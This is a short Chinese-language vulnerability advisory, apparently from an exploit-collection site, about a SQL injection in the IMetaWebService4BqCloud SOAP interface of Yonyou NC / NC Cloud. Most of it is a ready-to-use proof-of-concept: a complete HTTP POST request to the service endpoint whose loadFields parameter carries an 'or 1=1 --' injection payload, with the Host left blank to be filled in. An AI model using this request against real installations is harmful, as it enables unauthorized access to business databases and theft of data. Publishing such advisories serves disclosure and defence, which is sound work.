用友NC IMetaWebService4BqCloud 接口存在SQL注入漏洞

日期: 2023-08-21 | 影响软件: 用友NC | POC: 已公开

漏洞描述

用友NC/NC Cloud IMetaWebService4BqCloud 接口存在SQL注入漏洞

PoC代码

POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 310
Content-Type: text/xml
Soapaction: urn:loadFields
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud"><soapenv:Header/><soapenv:Body><imet:loadFields><!--Optional:--><imet:string>SmartModel^2'+or+1%3d%3d1+--</imet:string></imet:loadFields></soapenv:Body></soapenv:Envelope>

相关漏洞推荐